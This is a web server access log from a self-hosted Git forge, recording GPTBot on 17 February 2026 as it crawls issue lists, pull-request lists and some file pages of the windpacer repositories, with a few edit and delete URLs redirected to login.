git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:06:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:06:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:06:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:06:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:06:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:06:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&sort=recentupdate&state=open&type=all" +[17/Feb/2026:19:06:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:06:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:06:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:06:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:06:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:06:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9976] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:06:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:06:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:06:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:06:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:06:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=open&type=all" +[17/Feb/2026:19:06:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:06:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:06:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:19:06:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9964] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&state=open&type=all" +[17/Feb/2026:19:06:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10135] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&state=all&type=all" +[17/Feb/2026:19:06:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:06:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:06:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:06:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:06:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10140] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:06:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md?display=rendered" [Client 74.7.227.38] [Length 11253] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" +[17/Feb/2026:19:06:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:06:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:06:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:06:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 515] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" +[17/Feb/2026:19:06:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 10531] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" +[17/Feb/2026:19:06:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" +[17/Feb/2026:19:06:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" +[17/Feb/2026:19:06:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" +[17/Feb/2026:19:06:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" +[17/Feb/2026:19:06:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 10920] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/tasks.json" +[17/Feb/2026:19:06:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12282] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/tasks.json" +[17/Feb/2026:19:06:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:06:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:06:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 11170] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:19:06:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&state=open&type=all" +[17/Feb/2026:19:06:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10145] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&state=all&type=all" +[17/Feb/2026:19:06:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10067] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:06:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" +[17/Feb/2026:19:06:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" +[17/Feb/2026:19:06:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15661] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:19:06:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:06:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:06:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=leastupdate&state=open&type=all" +[17/Feb/2026:19:06:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:06:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:07:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:07:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:07:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=open&type=all" +[17/Feb/2026:19:07:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.48] [Sent-to 192.168.0.250] 